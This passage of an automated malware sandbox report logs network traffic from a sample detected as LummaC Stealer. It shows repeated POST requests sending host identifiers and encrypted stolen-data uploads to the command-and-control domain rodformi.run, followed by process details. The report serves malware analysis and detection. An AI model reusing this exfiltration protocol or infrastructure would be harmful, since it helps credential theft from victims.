    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 14903
    Host: rodformi.run
2025-04-02 09:33:24 UTC | 14903 | OUT | Data Ascii (decoded from the raw dump; truncated in the report):
    --MYI1hYv5
    Content-Disposition: form-data; name="uid"

    60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777
    --MYI1hYv5
    Content-Disposition: form-data; name="pid"

    2
    --MYI1hYv5
    Content-Disposition: form-data; name="hwid"

    BAE255385BFA29DDF3E
2025-04-02 09:33:24 UTC | 810 | IN | HTTP/1.1 200 OK
    Date: Wed, 02 Apr 2025 09:33:24 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qmes6fqWYoZEVSYxXwOpvCmlOMT8msqGTE9Fgi8%2FwERjT0ccRoaHAerwA%2B%2Fv3Pg5JJseilzjgEw3Q9kgi56XDo8tgtl%2BSoDt%2F%2F5nfMzSTvWMuTfWfPadMixUKvS4bWo%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 929f5311ff1d42da-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=97513&min_rtt=97314&rtt_var=20828&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2826&recv_bytes=15832&delivery_rate=38049&cwnd=252&unsent_bytes=0&cid=bb2d27f1671545bc&ts=750&x=0"
2025-04-02 09:33:24 UTC | 73 | IN | Data Ascii (chunked body, decoded from the raw dump):
    43
    {"success":{"message":"message success delivery from 161.77.13.2"}}
2025-04-02 09:33:24 UTC | 5 | IN | Data Ascii (terminating chunk):
    0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49683 | 172.67.197.67 | 443 | 6208 | C:\Users\user\Desktop\random.exe

Timestamp | Bytes transferred | Direction | Data
2025-04-02 09:33:25 UTC | 280 | OUT | POST /aUosoz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=UG43df94ljvlU3YQz
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 15075
    Host: rodformi.run
2025-04-02 09:33:25 UTC | 15075 | OUT | Data Ascii (decoded from the raw dump; truncated in the report):
    --UG43df94ljvlU3YQz
    Content-Disposition: form-data; name="uid"

    60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777
    --UG43df94ljvlU3YQz
    Content-Disposition: form-data; name="pid"

    2
    --UG43df94ljvlU3YQz
    Content-Disposition: form-data; name="h
2025-04-02 09:33:26 UTC | 264 | IN | HTTP/1.1 200 OK
    Date: Wed, 02 Apr 2025 09:33:26 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: close
    Server: cloudflare
    Vary: Accept-Encoding
    Cf-Cache-Status: DYNAMIC
    CF-RAY: 929f531b6b31aa2a-EWR
    alt-svc: h3=":443"; ma=86400
2025-04-02 09:33:26 UTC | 73 | IN | Data Ascii (chunked body, decoded from the raw dump):
    43
    {"success":{"message":"message success delivery from 161.77.13.2"}}
2025-04-02 09:33:26 UTC | 5 | IN | Data Ascii (terminating chunk):
    0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49684 | 172.67.197.67 | 443 | 6208 | C:\Users\user\Desktop\random.exe

Timestamp | Bytes transferred | Direction | Data
2025-04-02 09:33:26 UTC | 281 | OUT | POST /aUosoz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=MG2zEvW86fpUbh578x
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 20444
    Host: rodformi.run
2025-04-02 09:33:26 UTC | 15331 | OUT | Data Ascii (decoded from the raw dump; truncated in the report):
    --MG2zEvW86fpUbh578x
    Content-Disposition: form-data; name="uid"

    60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777
    --MG2zEvW86fpUbh578x
    Content-Disposition: form-data; name="pid"

    3
    --MG2zEvW86fpUbh578x
    Content-Disposition: form-data; name
2025-04-02 09:33:27 UTC | 808 | IN | HTTP/1.1 200 OK
    Date: Wed, 02 Apr 2025 09:33:27 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V1tuvbzUa9pms6WRriXvhdWljHFBsBDujXqUV5OMGR2wG%2FSWUKYcPysi9Qx%2FbYc4Yj3pz9vsSJtKWk43hHulST%2Bjh000rsVv%2Bq54H6LrMP2Ej%2Bu48nQVqD5kfnN9JsU%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 929f53227e8f83d0-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=97394&min_rtt=97351&rtt_var=20601&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2827&recv_bytes=21405&delivery_rate=38218&cwnd=246&unsent_bytes=0&cid=3f0c39ac58aae846&ts=651&x=0"
2025-04-02 09:33:27 UTC | 73 | IN | Data Ascii (chunked body, decoded from the raw dump):
    43
    {"success":{"message":"message success delivery from 161.77.13.2"}}
2025-04-02 09:33:27 UTC | 5 | IN | Data Ascii (terminating chunk):
    0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49685 | 172.67.197.67 | 443 | 6208 | C:\Users\user\Desktop\random.exe

Timestamp | Bytes transferred | Direction | Data
2025-04-02 09:33:28 UTC | 272 | OUT | POST /aUosoz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=6vE51zQQh0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 2556
    Host: rodformi.run
2025-04-02 09:33:28 UTC | 2556 | OUT | Data Ascii (decoded from the raw dump; truncated in the report):
    --6vE51zQQh0
    Content-Disposition: form-data; name="uid"

    60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777
    --6vE51zQQh0
    Content-Disposition: form-data; name="pid"

    1
    --6vE51zQQh0
    Content-Disposition: form-data; name="hwid"

    BAE255385BFA2
2025-04-02 09:33:29 UTC | 804 | IN | HTTP/1.1 200 OK
    Date: Wed, 02 Apr 2025 09:33:29 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EuLEhElA0FYicSrUkAUKf3bKU%2BM3Embw2mu2iafN5g3zplhjKGwSe3rov7VWYY4t%2BC%2BFRbGd7nLymJoUiUWRxFQl4ICnzSlI9e16xCG5woSajjXId%2FM5wKGTVbCBjqo%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 929f532e5e408cdd-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=98598&min_rtt=97782&rtt_var=21481&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2827&recv_bytes=3464&delivery_rate=38100&cwnd=231&unsent_bytes=0&cid=203b244b6be4ccc6&ts=534&x=0"
2025-04-02 09:33:29 UTC | 73 | IN | Data Ascii (chunked body, decoded from the raw dump):
    43
    {"success":{"message":"message success delivery from 161.77.13.2"}}
2025-04-02 09:33:29 UTC | 5 | IN | Data Ascii (terminating chunk):
    0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49686 | 172.67.197.67 | 443 | 6208 | C:\Users\user\Desktop\random.exe

Timestamp | Bytes transferred | Direction | Data
2025-04-02 09:33:29 UTC | 279 | OUT | POST /aUosoz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=zKMWnlQnU1r08E6
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Content-Length: 550482
    Host: rodformi.run
2025-04-02 09:33:29 UTC | 15331 | OUT | Data Ascii (decoded from the raw dump; truncated in the report):
    --zKMWnlQnU1r08E6
    Content-Disposition: form-data; name="uid"

    60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777
    --zKMWnlQnU1r08E6
    Content-Disposition: form-data; name="pid"

    1
    --zKMWnlQnU1r08E6
    Content-Disposition: form-data; name="hwid"
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: cb 03 e3 f8 94 6b 34 a0 94 42 43 3f a5 53 ef 89 27 48 3d de 1d b6 50 91 37 8c 51 96 cb 69 e6 15 9b fc 28 29 ff dd 58 dc 39 6a 38 a0 67 ce d5 61 12 01 05 0a 4b 43 f3 23 e8 8f a0 49 93 00 dd 8f a1 1d f6 ea 66 85 37 70 07 2e a3 cb cf bd bc d3 23 89 d6 e6 06 0d 82 cb 5e 2e 96 03 67 d1 55 39 70 91 39 3b c6 57 b8 a7 4a f2 ff 52 17 af a2 ce 53 7c 80 da f4 8c 66 2a 5b 3a 0e 40 7e 3a 66 b6 5a 3f ff 20 1b 72 e7 fb 16 d7 21 a5 6d d3 7d 2b 7d f7 17 78 c3 6b c6 b9 c9 82 a6 bb 91 40 de b9 54 ad c0 32 8e 31 aa 74 ca e7 55 43 b0 77 5e 0c 8f 21 a2 c8 00 7d 08 bc 93 17 bf 4c 73 fc dd 40 03 6c ef f8 79 58 b9 65 81 34 12 ce dc 0c 1f 84 a8 16 fc 1a 3b 26 01 32 12 70 21 ec 20 07 7a d9 88 83 50 4b 9b 7e bd 57 1d f3 08 58 73 ec fc 8d 95 c4 b4 c1 75 09 d7 f0 cc 6f 60 19 09 e6 b4
                                                                                              Data Ascii: k4BC?S'H=P7Qi()X9j8gaKC#If7p.#^.gU9p9;WJRS|f*[:@~:fZ? r!m}+}xk@T21tUCw^!}Ls@lyXe4;&2p! zPK~WXsuo`
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: 89 0f 26 81 0b 61 b1 8d d7 9c c5 d6 e5 79 0b a0 5e 61 cb 43 a5 d1 43 25 42 33 d1 06 62 ce 44 75 97 8c 36 64 e9 ea 45 dc 37 f4 ce 61 72 66 19 4a 16 d7 a5 de 38 14 56 21 b3 01 e7 bc 8a 66 c7 fb 14 f8 1f 54 83 26 1a 5c 6a b5 79 11 fa 0f 7d 66 1c dd 55 24 cd 02 ec d8 15 ca da 5b 3d 9a 57 9a d6 06 b1 77 ae ce aa be dd 9c 23 5d 5f 57 1a 14 2b 24 4f 66 e4 54 5a bc 37 3a f7 05 9c 75 57 28 e6 59 12 d5 dc 6b ba 09 b0 f7 4b 64 c7 e0 fd 4f 17 92 19 43 c7 7f bc 26 a4 20 73 8a 15 f5 59 51 d8 28 93 9b 27 6b 87 3c 9c 51 b4 de a4 6e 05 7e 1c de b9 09 0f ff af dd f5 c1 03 ac f6 72 9d 7f a5 e4 e9 26 4b 20 53 1a a3 86 a6 f8 55 70 6c 61 3e 56 e4 58 81 c9 f8 c3 be 3f e6 83 d3 da 31 3e f1 89 0e 80 18 31 95 2e 75 53 81 82 b8 65 e6 cb bd bf 00 68 8c 56 bf ee f9 23 c5 ea 98 43 22
                                                                                              Data Ascii: &ay^aCC%B3bDu6dE7arfJ8V!fT&\jy}fU$[=Ww#]_W+$OfTZ7:uW(YkKdOC& sYQ('k<Qn~r&K SUpla>VX?1>1.uSehV#C"
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: 7c 67 cb 6b 18 21 1d 1a 46 4c cf 64 b7 19 7d db 8d ec e9 c9 0e 66 0b eb 1d f5 20 2d a2 e3 61 eb a2 04 ef 57 ac 6e 88 12 ea 9a 8e 6a 64 5c 22 c0 12 fb 13 08 94 37 6a f8 f2 39 c5 d5 76 79 0d f7 0d 8c a1 59 25 7b 7a 4b a2 79 42 ca 5e a2 89 4c f2 50 af 92 0e f0 05 04 ee 9e d4 1c 9a fd f2 07 a8 84 f1 0e bb 3c b0 b1 1a df 58 2e 23 dc ae 88 d7 67 c4 b3 a3 8b f2 66 1e 83 0b 6d 41 47 f4 8c 30 74 bf eb e7 50 70 78 c6 87 6e 3d d7 e4 a8 18 52 7a 5e 9a 92 97 98 39 e6 0c 39 a8 01 ad 03 ea 39 4f e2 9e 8f 0e 95 02 b7 97 c2 9d 36 39 81 00 ae 5e ec a2 9a 31 a5 dd f1 17 ca 86 1f ea cb 5c f3 9f d7 a9 a9 c7 93 b2 50 ea 1e 59 73 14 6d be 53 d3 85 7b 3b e0 be 66 c8 04 0a 05 52 fd 60 69 37 61 45 01 25 8e 4f 4e 13 2f cb 15 6e 63 60 6b f6 32 46 eb d2 10 9b 5a 22 9b d7 98 3e 5a c2
                                                                                              Data Ascii: |gk!FLd}f -aWnjd\"7j9vyY%{zKyB^LP<X.#gfmAG0tPpxn=Rz^999O69^1\PYsmS{;fR`i7aE%ON/nc`k2FZ">Z
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: e6 38 08 b0 f8 27 48 75 1e 75 79 bb b2 6c 2c 91 1b 2b 69 a8 4b e4 2b 4d 86 f0 a0 3e f3 b8 e3 3d 11 7d 01 0a d5 49 81 cc 02 ec 96 9a 58 b3 a1 e4 ac 4c c2 f4 4b 81 38 c0 0d 37 c0 b1 03 a1 38 3a e7 12 c8 ae d5 62 46 1d 7f 91 54 ab 0b af 7b 0e f0 b1 b0 ae 26 3e df b2 aa 6d 0c c6 5b 81 af 24 71 b7 1b 56 6b bc b6 d9 44 9e 95 ea 9c 28 1b 79 bc d0 92 2e 72 de 83 d2 17 03 f6 34 c4 d9 69 54 3d cf 32 28 d5 06 99 de 08 bd e5 1e 35 9a 78 b2 65 cc 25 bd a3 40 b3 ab 59 b1 b2 26 04 1a 6c 7b bc 97 e4 44 fa ad fc 52 9e 53 3b 50 5f f2 3d 1c 94 81 87 e1 0c 37 31 bd 7e 9d 28 5c 9f 61 cc b3 a9 9d 17 6d 3f 9d 6f 7f c9 b2 c6 ca 61 28 42 bb 13 b6 da df 25 ac ed f9 c6 27 82 52 d4 b7 76 fa bd 77 95 8a d0 6b 9b af fd a8 16 1e be b6 89 44 42 52 5a ef af 6e 86 48 52 03 6d 35 69 37 2e
                                                                                              Data Ascii: 8'Huuyl,+iK+M>=}IXLK878:bFT{&>m[$qVkD(y.r4iT=2(5xe%@Y&l{DRS;P_=71~(\am?oa(B%'RvwkDBRZnHRm5i7.
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: c8 ca 9f 8d 5e 07 1f a3 25 1f e3 f2 3f 8f d8 a2 bc 37 0c e3 a1 d9 a6 2c a8 90 44 df 47 69 95 ec ea e2 47 fd e4 76 65 29 14 f7 d2 40 e3 b3 72 f2 5b d7 84 1d c9 34 fa 3a e5 25 8e 4f f3 2d e1 62 59 22 bc 61 d7 c6 12 11 17 31 c2 1d 7f 72 3e 96 09 c4 f0 fc 88 29 a2 e0 15 54 b9 92 a5 e4 9e 1a 2c 42 f3 6c 67 4a 58 c5 45 e3 2d dc 1e 04 5b 28 d0 d8 48 a9 36 63 3d 0a b4 03 ea 91 51 ba 05 6f fb 82 ac 8c 5c f0 fe 91 f1 56 d8 e3 cd 5c 6a ec f9 3d 11 2c bc a8 c3 06 ba 3b 6d bc 7f 69 9a 4d 7e bc 27 61 08 51 ce d0 15 d3 05 2d 75 21 bd 95 2c 45 0d 9e 3b 39 d0 c0 51 24 27 af 62 01 96 1e 92 60 78 1b c0 78 36 2a 25 d3 b9 f1 05 b2 55 27 0c 84 51 a0 7f 60 da 66 63 86 bf da 28 1e f5 d1 44 69 af 7c bb f8 72 35 d6 a6 c3 9d 31 9d 0f 2a 11 42 45 8e 8c 2c 93 c4 0b 17 01 d3 61 3e 10
                                                                                              Data Ascii: ^%?7,DGiGve)@r[4:%O-bY"a1r>)T,BlgJXE-[(H6c=Qo\V\j=,;miM~'aQ-u!,E;9Q$'b`xx6*%U'Q`fc(Di|r51*BE,a>
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: 63 69 38 48 6e aa 21 15 f2 bc 7c ec 49 4b 33 43 a2 4c 69 f0 18 69 be cb 7e 5f b4 5f fb cc b4 df 73 10 ab 3a 9b bc e9 1f 62 10 ff 61 a8 13 69 d0 46 74 43 d0 0b 67 91 70 7f c3 77 53 39 f8 cc c7 72 17 e0 02 77 c5 81 e2 4b 1c 0d 32 5a 8d 84 00 bd 47 41 4b 99 ee 9c 49 fe ab 80 af 04 fe ea 3d 1a 12 1c cd 87 7c ac 36 5c 42 16 0e bc 95 38 15 38 d2 0d 83 d9 e4 f7 cb 41 34 db ae f8 cb 7d 1f cc c0 83 92 13 a4 69 e3 11 1e c6 35 0a f2 2e e6 6f cf 7b 1d 67 15 c2 be b6 9e 98 43 05 a4 34 7b 41 23 71 21 91 58 ce b0 5c f8 44 cd ee ce 9a 0a ff 0b 2a 37 bf fc d7 68 34 f0 cc 5a 47 48 bf 4c b8 33 c8 12 a4 f3 21 c0 86 ca 91 9c 61 32 11 02 14 39 ee e8 2d 06 4d 2a c9 5f a8 7c f1 0b 74 e3 f0 9c 22 81 14 90 2b d9 6c 2a 4a 91 2c e6 07 36 e8 06 26 1e 32 8d 32 e1 a6 3e d2 c4 24 76 e0
                                                                                              Data Ascii: ci8Hn!|IK3CLii~__s:baiFtCgpwS9rwK2ZGAKI=|6\B88A4}i5.o{gC4{A#q!X\D*7h4ZGHL3!a29-M*_|t"+l*J,6&22>$v
                                                                                              2025-04-02 09:33:31 UTC812INHTTP/1.1 200 OK
                                                                                              Date: Wed, 02 Apr 2025 09:33:31 GMT
                                                                                              Content-Type: application/json
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62hGGb642nvfHCbXrhnw3nyFLxHUU5uOkCFJJv94i2Vv92du7nDfDYVWnbPczVP%2BgcxVqn2EfDj1VAKEHxmAgYOBU%2B6ek3%2B0uT%2BzmeaHbN7flvz%2FDHeIxIIiuDYQrKU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 929f5335fe3c4271-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=99958&min_rtt=98077&rtt_var=22650&sent=268&recv=452&lost=0&retrans=0&sent_bytes=2825&recv_bytes=552959&delivery_rate=37976&cwnd=238&unsent_bytes=0&cid=4cd064f4f2c7198e&ts=1613&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49687 | 172.67.197.67 | 443 | 6208 | C:\Users\user\Desktop\random.exe
Timestamp | Bytes transferred | Direction | Data
2025-04-02 09:33:31 UTC | 264 | OUT | POST /aUosoz HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 103
Host: rodformi.run
2025-04-02 09:33:31 UTC | 103 | OUT | Data Raw: 75 69 64 3d 36 30 62 39 66 39 65 35 34 37 36 65 35 61 64 64 65 62 64 33 35 65 65 37 38 33 31 39 33 34 34 38 32 30 63 39 34 32 36 37 38 64 63 62 61 33 63 38 33 31 30 66 39 37 37 37 26 63 69 64 3d 26 68 77 69 64 3d 42 41 45 32 35 35 33 38 35 42 46 41 32 39 44 44 46 33 45 39 36 42 31 41 32 43 32 42 39 33 46 37
Data Ascii: uid=60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777&cid=&hwid=BAE255385BFA29DDF3E96B1A2C2B93F7
2025-04-02 09:33:32 UTC | 780 | IN | HTTP/1.1 200 OK
Date: Wed, 02 Apr 2025 09:33:32 GMT
Content-Type: application/octet-stream
Content-Length: 43
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xpbOEFsj1DulsTb%2FHdkOocOhK3JQvephX%2BiNrRzXvRLKVhLPW4f5PK326%2BS0%2BcOHZobbW7puOQ5o03J9PppdAF1vABbDUagNdxsCSJ9S0muUb7RW9ZHdvLabS9jXJys%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 929f53426a21acc5-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=97547&min_rtt=97290&rtt_var=20912&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1003&delivery_rate=37984&cwnd=241&unsent_bytes=0&cid=661a18a4c04eb084&ts=413&x=0"
2025-04-02 09:33:32 UTC | 43 | IN | Data Raw: c2 72 01 bb 07 05 93 54 94 9a b2 b1 f8 6e 63 58 05 cd 74 e5 ab d2 c8 47 8c 01 67 f9 68 4c bd 18 68 ae 52 00 2c 9f 85 38 d7 3a a9
Data Ascii: rTncXtGghLhR,8:


[Process activity chart: x-axis 0-15 s, y-axis 0-100]

[Process memory chart: x-axis 0-15 s, y-axis 0-20 MB]

[Process behavior distribution chart; categories: File, Registry]

Target ID: 0
Start time: 05:33:19
Start date: 02/04/2025
Path: C:\Users\user\Desktop\random.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\random.exe"
Imagebase: 0xe80000
File size: 1'872'896 bytes
MD5 hash: 7DDD1B8A415ABF939FFF535A63D55852
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1046421738.0000000005400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

No disassembly